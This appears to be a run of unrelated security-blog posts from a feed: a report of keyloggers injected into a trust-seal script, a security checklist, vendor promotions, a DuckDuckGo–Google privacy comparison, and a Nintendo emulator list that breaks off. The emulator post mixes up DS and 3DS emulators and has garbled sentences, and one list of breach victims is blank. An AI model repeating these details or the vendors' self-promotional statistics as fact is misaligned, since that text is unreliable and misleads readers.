Supply Chain Attack Hits Best of the Web Website

Supply Chain Attack Hits Best of the Web Website

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the site itself was injected with an information stealing malware.  

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and according to his latest tweet, DeGroot confirmed that the attackers used open S3 buckets to inject form jackers. DeGroot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel,,,, and

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”

7 Steps to Strengthen Your Cybersecurity Program Today

Managing a security program in today’s ever-changing cyber threat landscape is no small feat. Many administrators struggle with knowing where to even start. Cybersecurity programs must be continually evaluated and should evolve as cyber threats and company risk changes; however, these steps can guide you in the right direction to begin strengthening your security program today.

 1.  Assess your current security program.

The best way to assess a security program is to first choose a framework best for your company. A good framework to follow is the NIST Cybersecurity Framework, which is a comprehensive guide to baseline security requirements and controls any company can implement to strengthen a security program. For companies of all sizes, implementing a security control or practice must be evaluated from a business standpoint to determine if the benefit to the business outweighs the cost of the security control. Following a framework for this evaluation will help you prioritize cybersecurity initiatives and give your company a clear roadmap for the way you want to develop a cybersecurity program.

2.  Identify what data you have and where it lives.

Data cannot be protected if the custodians don’t know it exists, or where it exists. Identification of the data stored, created, or controlled by a company is crucial to understanding your cybersecurity and data protection priorities. Further, identifying whether sensitive data is stored in cloud services, on hard drives, or in file servers can drastically change the strategy needed in order to protect that data. Even Data Loss Prevention (DLP) tools are less effective if the tool is not looking in the right locations to determine whether data is being accessed or is leaving the protected network in some way. Identifying data locations can also help you to ensure your proprietary or confidential data is moved from less secure locations, such as private cloud storage accounts, to secure, company-controlled environments like an enterprise cloud account.

3.  Implement and enforce policies to combat insider threat.

Policies and procedure are essential to combat the human element of cybersecurity. Employees often do not understand what they can and cannot do with a company’s documents, hardware, and system access if there are no policies in place to guide them. Insider threat isn’t necessarily a nefarious actor out to steal company data; it often presents itself in examples such as a well-meaning employee who shares a document with a partner in an insecure way – exposing the data to unauthorized access.

4.  Implement a security awareness training program.

Continuing with the theme of well-meaning employees, phishing attacks are the cause of data breaches in 98% of the cases reported (Verizon DBIR). Anti-phishing measures can only go so far to detect phishing attacks, so it’s up to the employee to know how to recognize a phishing email, and to know what to do with that email. Security awareness training can teach an employee to recognize the signs of phishing emails and may prevent the employees and the company from falling victim to a phishing attack.

5.  Talk to your IT team for multi-factor authentication and anti-phishing measures.

Multi-factor authentication (MFA) is one of the best security controls you can implement to prevent unauthorized access to company systems.  Simply put, MFA works by adding not only something the user knows (i.e. a password) but also something the user has (i.e. a texted code to a cell phone, or better yet, a hardware key an employee has to interact with) to system access. Many instances of unauthorized system access could have been thwarted by a company’s use of MFA on their critical systems. In addition, as mentioned above, phishing attacks are responsible for a large majority of data breaches and anti-phishing measures should be taken to protect corporate email systems.

6.  Implement a third party vendor risk management program.

Many companies work with third party vendors and service providers and in some cases, these providers need access into corporate infrastructure and IT systems.  You can invest millions or even billions into your cybersecurity program, but it can be for nothing if a trusted service provider becomes compromised. As is the case in many high profile breaches, it was the service provider who suffered the breach, in turn causing their partners to suffer the same fate.  Implement a third party risk management program in which new and existing service providers must show proof of their internal security program practices and controls, before allowing them access into a corporate system.

7.  Implement onboarding and offboarding policies that integrate HR and IT.

When onboarding a new employee, a policy needs to be in place that allows for your HR and IT departments to work together to determine what information the new hire needs access to in order to do their job.  Equally important, you must also have a policy in place for offboarding.  Without proper offboarding policies, former employees or contractors may still be able to access certain IT systems well after the they’ve left the organization. Cases where former contractors or employees retained access to a company’s IT systems for months or even years after that access should have been revoked are not uncommon. And in many cases, an employee leaves a company involuntarily, and decides to use their company access to destroy documents, steal company intellectual property, and can be as destructive as deleting entire servers and infrastructure, leaving the company to pick up the pieces. Access to systems should be approved by HR (to prevent extra accounts and backdoors from being created without company knowledge), and departed employees should be immediately deprovisioned from all systems.

Implementing any cybersecurity controls or program initiatives requires a company culture shift and executive buy-in. However, organizations of any size simply cannot afford to ignore security, nor can they wait for a breach to occur before security is taken seriously. The steps outlined in this post will be an excellent start to a strong security program and will help you gain traction for future program changes and improvements.

Download the Checklist to Share.

The post 7 Steps to Strengthen Your Cybersecurity Program Today appeared first on GRA Quantum.

Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments

According to a new Ovum report, “[Azure Sentinel]…positions [Microsoft] to be a force for change in a security information and events management (SIEM) market that is ripe for disruption at the moment.” As enterprises migrate to the cloud, they’re increasingly operating on-premises and cloud environments spread across multiple cloud providers. These complex environments and multiple security products can make it challenging for security professionals to make correlations across their entire infrastructure and separate the signal from the noise.

The report, titled Microsoft’s Expanded Horizons in Security, written by Rik Turner and published in April 2019, evaluated Azure Sentinel among other new Microsoft services and determined that hybrid cloud customers who use Azure as one of their cloud providers should consider Microsoft for security across hybrid and multi cloud environments.

It has been noted by Ovum that in the last few years new services and capabilities have been introduced that support operating systems and platforms beyond Windows. The report identified the following reasons that Microsoft security products are appropriate, if you need to secure non-Microsoft products as well as Azure:

  • Password-less authentication and conditional access.
  • Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure.
  • Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security.
  • Azure Sentinel may disrupt the security management marketplace.

Azure for password-less authentication and conditional access

Active Directory and Azure Active Directory (Azure AD) are market leaders for on-premises and cloud-based directories that many enterprises already use. In addition to provisioning and deprovisioning, security capabilities such as modern authentication and conditional access make Azure AD a compelling choice for identity access management (IAM).

In recent years, Microsoft has introduced many capabilities to support modern authentication. Multi-Factor Authentication (MFA) or 2nd-Factor Authentication (2FA) allows you to enforce a secondary authentication method, so you don’t rely on passwords alone. Azure AD supports password-less authentication, such as biometrics and FIDO-2 compliant keys, and the Microsoft Authenticator mobile app, which generates a one-time passcode or push notification, can serve as a secondary authentication method.

Azure AD conditional access gives administrators additional control over who can access company resources both on the first access attempt and throughout the user session. Conditional access works by evaluating the circumstances of the authentication request—such as the device used, the location of the request, the user, or the network—to assign a risk score and then automatically apply pre-defined access polices.

For example, if a user attempts to access sensitive data from an unsecure network, Azure AD can block the request. If a user has been deemed likely compromised, Azure AD can require a password reset before allowing access.

Azure AD security policies aren’t just for Microsoft products. Integration with Microsoft Cloud App Security, a cloud access security broker (CASB) lets you extend authentication policies to all your cloud apps including non-Microsoft applications.

Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure

Recent acquisitions and the Microsoft Intelligent Security Graph give Microsoft the data and technology to provide protection across identities, endpoints, emails, messages, documents, cloud applications, and infrastructure. The Intelligent Security Graph gathers threat information from Microsoft products deployed around the world, security partners, and Microsoft’s own security team. To make sense of trillions of signals, machine learning and artificial intelligence (AI) algorithms analyze the data to find correlations and patterns. The Microsoft Threat Protection suite of products uses analysis from the Microsoft Intelligence Security Graph to learn what is normal user behavior, so that it can detect and alert or block anomalous behavior.

Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security

Microsoft Information Protection helps secure data at-rest in file repositories, cloud storage services, and on users’ devices. It protects data in motion as it moves or travels to different locations. The service accomplishes this with four steps: detection, classification, protection, and monitoring. Microsoft Information Protection is able to detect sensitive data across on-premises and cloud repositories. Once the data is detected, Microsoft Information Protection classifies and labels it based on a pre-defined taxonomy that identifies how sensitive the data is, such as “Highly Confidential” or “Non Business.” Protection is applied based on the classification and can include actions such as file encryption. You can set policies to prevent copy and save functions, among other protections. Monitoring capabilities allow administrators to track the document as it moves inside and outside of your organization.

Microsoft Cloud App Security integrates with Microsoft Information Protection to extend the discovery, classification, protection, and monitoring capabilities to cloud apps. Administrators can even quarantine a file or limit sharing after it has moved to non-Microsoft cloud services.

Azure Sentinel may disrupt the security management marketplace

Ovum’s report identifies opportunities to offer better products in security management, especially SIEM platforms and products. SEIMs aggregate log files into one repository, so security teams can analyze the data and remediate detected threats. As the amount of data has increased, the need to augment the SIEMs with more robust analytics capabilities has exploded. SIEMs charge a lot to store log files, and customers are overwhelmed by the number of alerts, many of them false positives generated by their SIEM platforms.

Azure Sentinel can save time, reduce costs, and reduce alert fatigue by using AI and machine learning models to sift through the noise and more accurately identify real threats. Azure Sentinel currently aggregates data from Office 365 apps and data from security partners. In pilot tests, it reduced alert fatigue by as much as 90 percent.

Microsoft’s other security management offerings can help customers manage security across a diverse cloud ecosystem. Azure Security Manager helps customers stay compliant with regulations, identifies security vulnerabilities, and detects and blocks threats. Later this year, these capabilities will be extended to Amazon Web Services (AWS) and eventually Google Cloud Provider (GCP).

Learn more

The report offers several examples of how Microsoft is evolving its security strategy to support the complex environments that enterprises must secure. Ovum expects that Microsoft will continue to expand the number of products that secure multiple platforms as it provides more support for Mac, Linux, AWS, and GCP.

Read the Ovum report to learn more about how Microsoft’s current offering and strategy makes it a good fit for current Azure customers who have a mix of on-premises and clouds and/or use two or more cloud service providers.

The post Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments appeared first on Microsoft Security.

Duckduckgo vs Google: A Security Comparison and How to Maximize Your Privacy

Preoccupied with privacy? You’ve come to the right place. In today’s guide, I’ll go through everything you should know about Duckduckgo vs Google, how each of them works and how you can make the switch work for you (or not). You’ll also get performance comparisons, pros and cons for each product and advice on how to make the most of your privacy.

Should you decide in the end to switch to the Duckduckgo search engine over Google (I won’t tell you what to do, the decision is entirely yours after getting all the info below), I’ll also share extra advice on how to make the most out of your Duckduckgo products. Since the software suite is not limited to the search engine, there are also some software products to consider. But first thing’s first, let’s check out the Duckduckgo vs Google competition, comparison, and in-depth analysis.

Duckduckgo vs Google: The Competition Between Them and the Shift of Users

Usually, when people think of the Duckduckgo vs Google competition they are immediately thinking of the search engine Duckduckgo vs the search engine Google. Namely, this debate is about whether to use Duckduckgo or Google as your default browser search engine and / or homepage.

Even though Duckduckgo has other tools and apps besides its search engine, as I’ll get into below, for now let’s keep referring strictly to the search engine. This way, you’ll understand better what all the fuss is about with the Duckduckgo vs Google debate. Here’s an overview of public perception on it and everything you need to know about the context of this competitive comparison.

As the tools and techniques used for data gathering have slowly turned into more and more comprehensive algorithms tracking scores of information, both consumers and businesses have become more preoccupied with privacy. The rise of the so-called big data and big tech conglomerates has led to an increased level of surveillance which makes most people uncomfortable.

The fact that all the search history of users is tracked by Google (even in incognito browser mode) has contributed to the growing discomfort of concerned users.

If they’re not particularly concerned with how Google itself manages their personal data, then they’re concerned about data breaches.

Nowadays, with so many breaches making the headlines, it’s hard to trust that your data will remain as private as you’d like. Even if the entities you’re willing to share that data with have your confidence, no one is truly unhackable.

So How Are Duckduckgo and Google Competing?

Google doesn’t compete with Duckduckgo so much, in the grand scheme of things. Google is the big guy in the industry and while they are certainly aware of their smaller competitors catching up, it’s not really the same league. Yet.

Virtually all internet users tend to be Google search engine users, by default. The main strategy for Google is to try to hold on to the users it has by implementing better security and privacy protection measures. This is something definitely on their agenda, but the issue still remains that user data is tracked. Therefore, Google is leaking some users who are leaving its boat in order to climb aboard that of Duckduckgo.

For their part, Duckduckgo are directly positioning themselves as an alternative and competitor to the Google search engine. Their very blog is aiming to answer the very direct question of ‘Why You Should Use Us Instead of Google’.

So, why do some users prefer switching to Duckduckgo from Google? Here’s our unbiased comparison.

Duckduckgo Search Engine at a Glance: Pros and Cons

Obviously, since many users (exact number unknown) are switching to Duckduckgo from Google, the product is a great one, for people who are more concerned with privacy.

Why is the number of Duckduckgo users unknown?

Well, that’s the beauty of it: not even Duckduckgo knows exactly how many users it has, precisely because they do not track them. Nice, right?

However, according to their official approximations based on the number of searches they get each month and based on the fact that each user makes 1 search per day, on average (so 30 per month), their total user pool should be around 25 million people. That’s pretty impressive.

As a side note, I’d like to point out that my intuition says people make more than 30 searches per month if they are active internet users. And if they heard about Duckduckgo enough as to use it, they are probably tech-savvy and active enough online to use their devices almost daily. Therefore, I’d say that there’s a good chance that some users only switch to Duckduckgo when they are doing searches which they would rather keep truly private. Funny thought.

As you can see, the main advantage, unique selling point and promise of the Duckduckgo search engine is its utter privacy. Here’s the entire picture of my Duckduckgo review, broken down in pros and cons.

Pros of Duckduckgo as a search engine:

  • Perfect privacy. No data on your online searches collected or stored. (If you want this privacy to extend further than searches and to all your browser activity, you need to install the complementary Duckduckgo products, which I described below).
  • No ads targeting you based on your searches.
  • No social engineering techniques used on your based on your searches and other interests.
  • You can be sure you are getting the same search results as all other users (no targeting or profiling).
  • 1-page search results. Infinite scroll: as long as you keep going down, more search results keep loading. It’s a well-known fact that many users don’t make it to the second page of Google search results, but Duckduckgo just presents to you more info on the same page so you never have to click next and lose the initial results from sight.

Cons of Duckduckgo as a search engine:

  • Has a few nice extra perks and features, but still not as many as Google. Just think of Google Maps, Google Flights, Google Finance, Google Books, etc.
  • Less personalization: Duckduckgo doesn’t remember your search history, which is technically an advantage for privacy, but it can also be less convenient sometimes.

screenshot with duckduckgo search

For example, here’s a Duckduckgo search I did for ‘Aviatorilor’, a place in Bucharest, the city I live in. Normally, with Google, I would also get the option of quickly checking out on the map where that place is and how to get there from my location, how long will this take and so on.

In terms of privacy, Duckduckgo clearly wins. But if privacy is not your pet peeve, Google is an incredible product as well, and not one to reject without careful consideration. Here’s how things look like from the other side, too.

Google Search Engine at a Glance: Pros and Cons

Google is not the immediate loser in this competition, however. Not only because it’s still leagues away from Duckduckgo and because most internet users still use the Google search engine.

But it also has unique advantages when compared to Duckduckgo, advantages which derive precisely from its data collecting practices. After all, even if your personal data is used by Google to make money, you still get a few benefits too.

It all comes down to whether you prefer privacy or personalization. Since personalization requires data storing, you can’t have both.

So, here are the pros and cons of the Google search engine, very briefly.

Pros of Google as a search engine:

  • Displays unique content (including advertising content) tailored for your preferences and history
  • Offers built-in features which can be of help (like Google Maps, or help with calculating your trajectory to a place you’re searching for, or search results filters like Books or Flights, etc.)
  • Remembers your search history (this also counts as a con, but it can be helpful in some cases when you want to revisit a web page you forgot to save elsewhere)
  • It’s integrated with your other Google accounts and products, which can sometimes be rewarding.

Cons of Google as a search engine:

  • Remembers your search history (also counts as a pro if you need it, see above).
  • Not even incognito browsing is truly private (read the fine print the next time you open an incognito browser tab in Chrome – or Mozzila, for that matter).
  • Sells your data to third parties and offers them sophisticated tools of tracking you across the web so you can be bombarded with tailored ads.
  • Pulls data from your private emails in order to spam you with ads. Google representatives say this is an automatic process and that no human employee sees your personal emails but it can still be uncomfortable for some users. Imagine, for example, that you and your partner are surprised with an unexpected pregnancy and you’re considering abortion, only to be spammed with baby carriage ads all of a sudden.

How to Protect Your Privacy with the Duckduckgo Search Engine

If you decide to go for Duckduckgo as a way to protect your privacy a bit more, here is everything you need to know in order to make the most of it. The goal is to increase your privacy while also making sure you understand all the ways you can use the Duckduckgo technology to your fullest potential and, if possible, to preseve some of the convenience we are used to from the Google days.

Frequently asked questions about Duckduckgo

Q: Can you browse dark web websites with Duckduckgo?

A: Indeed, you can. But we’d recommend using the go-to browser for the deep and dark web, which is the Tor browser. Many users browse the darker regions of the internet by using the Duckduckgo search engine on the Tor browser.

That still doesn’t mean that doing illegal things on the dark web or on the deep web will stay secret if you do, however. Law enforcement can still track illegal things taking place there (as they should). But as far as privacy goes (and if you don’t want the other users lurking around the creepy corners of the web to see you), Duckduckgo is a great tool.

Q: What browser is better for privacy, Tor or Duckduckgo?

A: First of all, let’s make something clear: there is no Duckduckgo browser on computers. There’s just the Duckduckgo extension to be added to Chrome. But you can use Duckduckgo as a search engine on the Tor browser and that is, indeed, a much more private option than using Duckduckgo in Chrome (even with the extension installed).

On the other hand, there are Duckduckgo browsers for mobile devices (more on those in the products section below). Still, mobile devices also have the option of using the Tor browser for Android. Both are just as safe, privacy-wise.

Q: How does Duckduckgo make money if it blocks ads?

A: One of the major things that puts people off regarding Google is that it makes money selling their data to advertisers. You know what they say – when a product is free of charge, it’s because you are the product.

So, in search of more privacy and less misuse of their data (or less risk of data breaches), people switch to Duckduckgo. But then they think ‘wait, but Duckduckgo is also free’. So how do they make money, then, if they don’t store and sell data?

Just because they offer you complete privacy, it doesn’t mean Duckduckgo has no advertising ties. The Duckduckgo business model is still based on advertising and affiliate revenue. The ads are displayed on the right of your search results, based on the exact keyword of the search. But unlike Google, those ads are not personalized (as in, based on your search history, demographics, shopping history, etc.), because your data is not tracked.

Other Duckduckgo Products to Consider

Mainly, Duckduckgo is a search engine and that’s their core product offering. A search engine with a focus on privacy much above Google privacy practices, which is great for the users who are concerned about this. In today’s digital landscape, we should all be a little more watchful of our private data and what happens to it.

So the privacy aspect of the Duckduckgo search engine is what makes people use them.

The search engine is their main product, and you can access and use it as an URL here. It’s simple and clean and comes with no other product required for its use.

On the other hand, you can also access this search engine from the Duckduckgo products which complement it. Here are the options:

  • The Duckduckgo extension for Chrome: As far as security goes, this is a great Chrome extension to add*. It’s great if you want to keep using Google Chrome (it’s not like you want to reject the brand altogether) but still make sure that the Duckduckgo search engine is used everywhere in your browser by default, and that your data is not collected or stored. Using the Duckduckgo extension for Chrome will also block advertising trackers.
  • The Duckduckgo Privacy Browser (Android app): This is a privacy browser meant to be used on tablets and smartphones using the Android OS.
  • The Duckduckgo Privacy Browser (Apple app): This app is the same, but issued for Apple mobile devices (like iPhones).

You will notice that there is no Duckduckgo browser for computers or laptops. That’s because it isn’t needed: the Duckduckgo extension for Google Chrome effectively turns your browser into a Duckduckgo browser.

Of course, you can still use the Duckduckgo search engine with other browsers as well, such as Mozilla Firefox, or Opera and so on.

Some users who really want to maximize their privacy protection use the Tor browser with the Duckduckgo search engine. Duckduckgo is actually the default search engine for the Tor browser, especially desirable for users who want to browse the deep web or the dark web safely.

Important note: you will notice many other sources and blogs saying Duckduckgo is a ‘safe browser’ or ‘secure browser’. This safety and security they are referring to only extends to the privacy aspect. Using Duckduckgo will not keep you safe from viruses, malware, ransomware, and other internet dangers. Only a full security solution (based both on an anti-virus component and a traffic filtering, proactive component, like our Thor Premium Home) can protect you from cyber-attacks.

*You can also check out other great Google Chrome extensions for increased security (all hand-picked by us and devoid of any ulterior motive like compensation or whatever).

Bonus: 15 Extra Duckduckgo Features which Google Doesn’t Have

#1. Seeing social media bios

You can have links to the social media profiles featured on a website directly from the search results. If you want to connect to an author or customer support for a specific business and so on, Duckduckgo will point you directly to those profiles, no need to enter the website and manually search for them.

#2. App store alternatives to apps

You can search for apps in the app stores just as you would do in any other search engine, but Duckduckgo will also present you with alternatives for the same thing. No more time wasted on scout work.

#3. The Duckduckgo bangs

This is a very cool feature that allows you to search within a specific website for the words you want. Here is the entire list of Duckduckgo bangs.

#4. Weather data available instantly

You can search for simple things like ‘Is it raining in [town name]?’ and you’ll find out what you need to know instantly.

#5. Keyboard shortcuts

Macros and other cool keyboard shortcuts are just a few settings away in Duckduckgo.

#6. Emoticon ‘translations’

Not sure what an emoticon like ‘;;)’ means? Just ask Duckduckgo. (P.S: It’s something from the ancient times of Yahoo Messenger and I know it because I’m old. No, I’m not serious about the last part).

#7. Quick stopwatch

Just what the name says.

#8. Drink recipes

If you search for stuff like ‘how to make a mojito’, the recipe will be displayed right in the search results, no click required. Cheers!

#9. Password generator

Just like other browsers, Duckduckgo will help you generate stronger passwords. (This is important because of credential stuffing attacks and so on). But unlike other browsers, it won’t store them in any way. That’s up to your memory, password manager tool, etc.

#10. Finding rhymes

Troubled by some poetry writing and you just can’t find the rhyme? Or you’re unsure whether two words actually rhyme? No worries, ask Duckduckgo and it will tell you. Yes, seriously.

#11. Calendar as an instant answer

Google also has a calendar feature, but with Duckduckgo it’s an instant answer. You can just search for ‘March 2021’ and you will instantly see the month calendar laid out right in the search results.

#12. Loan calculators

Need help figuring out interest rates and stuff? Duckduckgo has you covered with this too.

#13. Cool features for developers

Plenty of nice things. Here’s just a few:

  • Generate lorem ipsum text quickly and automatically
  • Encode links to machine-readable text
  • Convert binary code to decimal code
  • Convert content to ASCII texts
  • Show a list of special characters and their HTML values
  • Show HTML value for any special character
  • Convert colors to their universal numeric code
  • Show colors based on hexadecimal values

#14. Anagram solver

If you have a poetry writing assistant built-in, why not also an anagram solver assistant? Yes, it really works.

#15. Instant text converting for lower-case, upper-case and capital letter

This is super-useful whenever you need to modify a text in this regard, and it’s a feature currently supported nowhere else.

Final words

If you think these Duckduckgo features look good, rest assured that there are many, many more. Some are downright useful, others just cute, but there’s no denying that Duckduckgo is heading on the right track when it comes to popularity.

This surge isn’t limited to the geek community. More and more users are making their choice in the Duckduckgo vs Google battle, and it’s not in favor of the Google giant.

The post Duckduckgo vs Google: A Security Comparison and How to Maximize Your Privacy appeared first on Heimdal Security Blog.

Keys to Scaling Your Application Security Program

It’s best practice to kick off your AppSec inititive by starting small, scanning your most business-critical apps, and addressing the most severe flaws. But it’s also best practice to scale your program to eventually cover your entire app landscape, and all flaws. Why? First, because you can be breached through non-critical apps; JP Morgan was breached through third-party software supporting its charitable road race, and Target was breached through its HVAC vendor’s software. Second, you can be breached through a low-severity vulnerability. Oftentimes, a low-severity flaw could be just as risky, if not more so, than a higher-severity flaw. For example, a low-severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit.

How do you make this transition from few to many, especially with limited security staff and expertise? This is a significant challenge. In fact, we typically see AppSec programs fail for two reasons: Lack of experience in running an application security program, and the inability to hire enough qualified staff to run application security tools at scale. Very few application security managers have run large programs before and have the experience to predict ramp up and adoption. The global shortage of security professionals also makes it difficult to hire enough people to coordinate between development and security teams. The 2018 Cyberthreat Defense Report found that a rising shortage of skilled personnel is the number one inhibitor organizations face when trying to establish a security program.

Yet, we’ve also helped thousands of customers grow and mature their AppSec programs over the past 12 years, and we know there are a few keys to effectively scaling an application security program. These keys include:

The right partner

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise and free your team to focus on managing risk by taking these tasks of their plates:

Addressing the blocking and tackling of onboarding

  • Application security program management
  • Reporting
  • Identifying and addressing barriers to success
  • Work with development teams to ensure they are finding and remediating vulnerabilities

We’ve seen the difference this support makes: Veracode customers who work with our security program managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics.

In fact, data collected for our State of Software Security report found that developers who get remediation coaching from our security experts fix 88 percent more flaws.

Security champions

Another way to scale your AppSec program is to develop and nurture security champions within your development teams. While these developers aren’t (and don’t have to be) security pros, they can act as the security conscience of the team by keeping their eyes and ears open for potential issues. The team can then fix the issues in development or call in your organization’s security experts for guidance. An embedded security champion can effectively help an organization make up for a lack of security coverage or skills by acting as a force multiplier who can pass on security best practices, answer questions, and raise security awareness. Because your security champion speaks the lingo of developers and is intimately involved in your organization’s development projects, he or she can communicate security issues in a way that development teams will understand and embrace.

How can you start developing security champions?

  • Get leadership buy-in. Make sure management, the security team, and the Scrum leaders are willing to invest the time, money, and resources it will take to make security champions effective.
  • Set the standard. Create expectations for what security champions should do and incorporate it into their pre-existing peer review work to minimize disruptions.
  • Track success. Make security a KPI so your organization can evaluate the ROI of the program
  • Provide training. Volunteers can bring passion, but it’s up to your security experts to provide the knowledge your security champions will need to review code for flaws and pass best practices on to the development team.
  • Build community. Make sure security champions have ample opportunity to meet with each other and the security team to discuss specific issues and overall trends.

Cloud-based solution

In addition, a cloud-based application security solution can help you scale your program without a lot of extra cost or hassle compared to an on-premises solution. When an on-premises application security program needs to be scaled, enterprises frequently need to track down more of hard-to-find security specialists, in addition to installing more servers.

Things that usually cost extra in an on-premises solution — features such as integrations, onboarding, upgrades, and maintenance — are all included with a cloud-based solution. This allows your security team to focus on scaling your AppSec efforts without worrying about going over budget.

Learn more

Application security is about more than scanning; the ability to scale your program is a critical factor that can make or break your program. Learn more about AppSec best practices in our new eBook, Application Security: Beyond Scanning.

Fallout from a Fallout

It is often that a data breach reveals other issues that a business is experiencing, but it isn’t every day I see the opposite. When I heard about what was happening at Bethesda Softworks and their online game, I was interested immediately. The background on this is simple enough. Bethesda is a well-known video game […]

The post Fallout from a Fallout appeared first on Privacy Ref Blog.

Why You Should Pick a Leader for Your Enterprise Email Security

Email is a mature technology, but threats targeting email are evolving and getting more sophisticated. 97%1 of ransomware attacks come from email. That’s why there are so many email security vendors and solutions in the market offering different types of technologies and coverages. Picking the best email security solution for an organization can be overwhelming.

Maybe it doesn’t have to be. Forrester Research, a well-known independent research firm, released “The Forrester Wave™: Enterprise Email Security, Q2 2019” report on May 16, 2019. Using its 32-criterion evaluation of enterprise email content security providers, Forrester identified the 12 most significant vendors and researched, analyzed, and scored them. This report shows how each provider measures up and helps security and risk professionals select the right one for their needs.

Trend Micro has been named a Leader in the Forrester report. What’s special is that we also received the highest score in the Strategy category among all 12 vendors. Furthermore, we got the highest score possible for the “Technology leadership” criterion, which is a sub-criterion of the Product Strategy criterion. Trend Micro also received the highest score possible in the “Deployment options” and “Cloud integration” criteria.

Highest score possible for “Technology leadership” criterion in Strategy category – our takeaways

Building on 20+ years in email security, Trend Micro continues to make strong investment and technology innovation in this market. Email threats are evolving, so do Trend Micro’s email security solutions.  To cite just a couple of examples, new technologies developed by Trend Micro to combat latest email threats include:

  • The unique, patent-pending Writing Style DNA technology compares the writing style of suspected fraud emails to the known AI model of the executive being impersonated. This technology adds another layer of filtering for Business Email compromise (BEC) attacks on top of the machine learning-based email header and content analysis. To-date, Trend Micro has built AI writing style models for almost 7,000 high-profile users, and found 5,400 additional attacks at 160 organizations. This is the final detection layer after Microsoft Office 365 and/or email gateway filtering and other Trend Micro anti-phishing filters.
  • Computer vision detection of popular fake login sites for account takeover protection. This patent-pending technology blends computer vision image analysis technology with artificial intelligence to “see” fake websites. It protects customers from credential phishing attacks.

With a long and innovative history with email security, Trend Micro remains at the forefront of the industry with a strong strategy that continues to position its customers well over the long term.

Highest score possible in “Deployment options” and “Cloud integration” criteria – our takeaways

Trend Micro is the only vendor to offer dual layer email protection via a cloud-based API plus SMTP solution for advanced threat protection. This unique approach provides “best of both worlds”, offering the benefits of both deployment types. Email gateway (SMTP solution) is perfect for inbound filtering and outbound DLP or email encryption. Trend Micro’s API solution is quick and easy to deploy, and can protect internal phishing emails for your Office 365 or Gmail, as well as cloud file sharing services (e.g. OneDrive or Google Drive).

Trend Micro email security is proven to be effective in protecting customers. In 2018, Trend Micro Cloud App Security, the API solution, stopped 8.9 million high-risk threats that weren’t caught by Office 365 security.

By choosing Trend Micro, you are investing in a solution which will continuously evolve to combat tomorrow’s email security challenges.

Check out the report and see for yourself why Trend Micro is a leader in Enterprise Email Security.

1 TrendLabs 2017 Security Roundup, March 2018

The post Why You Should Pick a Leader for Your Enterprise Email Security appeared first on .

Another Intel Chip Flaw

Remember the Spectre and Meltdown attacks from last year? They were a new class of attacks against complex CPUs, finding subliminal channels in optimization techniques that allow hackers to steal information. Since their discovery, researchers have found additional similar vulnerabilities.

A whole bunch more have just been discovered.

I don't think we're finished yet. A year and a half ago I wrote: "But more are coming, and they'll be worse. 2018 will be the year of microprocessor vulnerabilities, and it's going to be a wild ride." I think more are still coming.

Best 5 Nintendo 3DS Emulator for Android, iOS & PC

The Nintendo 3D was introduced on February 26, 2011, in Japan and around the world. Later in less than six months, Nintendo has declared a significant price drop. Initially, Nintendo started experimenting with a stereoscopic 3D video game from the 1980s.

Nintendo didn’t taste great success initially, but gradually it continued to innovate, and in 2010 it announced its first Nintendo console managed in official 3D in the Nintendo Ds family that has achieved a great success.

Today we’ll talk about the few best 3Ds emulators for Android and PC that will help you play Nintendo games on your phone or PC, and you will not have to change any settings. If you want the new Nintendo Switch emulator, it is also available.

Best 3DS Nintendo Emulators for PC, Mac, and Linux.

1. nds4droid 

nds4droid is a free Nintendo DS emulator. It is still in its infancy, but supports many features you’d expect like save states and sound. It also supports the OUYA game console.

One of the best things about Nds4droid is that the application is open source, so any user can download it without paying anything and even change its code. Loading ROMs are exactly the same as it would be with any other emulator.

Nds4droid supports some video games, but it has its limitation. Some work perfectly, while others have problems with the emulator. Final Fantasy IV, for example, works well, but with a frame rate that is less than desirable.

Nds4droid is a powerful emulator for the Nintendo DS. It does not yet support the full catalog of Nintendo DS games, but you can still play excellent titles.

2. Drastic 3ds Emulator for Android

It is one of the fastest android emulators that play Nintendo games at full speed. The emulator works on enhancing the 3D graphics by 2 times, it gives you a smooth game experience and makes you win the games.  It can perform most popular games with ease. With this emulator, you can even enjoy high-end graphics on your smartphone. It has a lot of features. Screen layout customization, Google Drive support, fast forwarding, controller customization, software and hardware controller support are some of them to name.

3. Citra 3Ds Emulator For Windows

Citra is a work-in-progress 3DS emulator. Citra can currently emulate, with varying degrees of success, a wide variety of different homebrew programs and commercial software. It is compatible with multiple platforms such as Windows, Mac OS X, and Linux, the developers constantly work with the stability issues for the tool and it offers maximum features when compared to other emulators in the market.

4. NeonDS (for Windows)

NeonDS (for Windows) is a NintendoDS emulator that allows you to play old commercial games for Windows computers. This mouse mimics the stick on the Nintendo DS portable computer. The Nintendo DS is the first portable console that offers two screens; one of them is a touch screen. NeonDS allows you to emulate the Nintendo DS, and let you play DS games on your computer.

5. 3DS emulator app for iOS

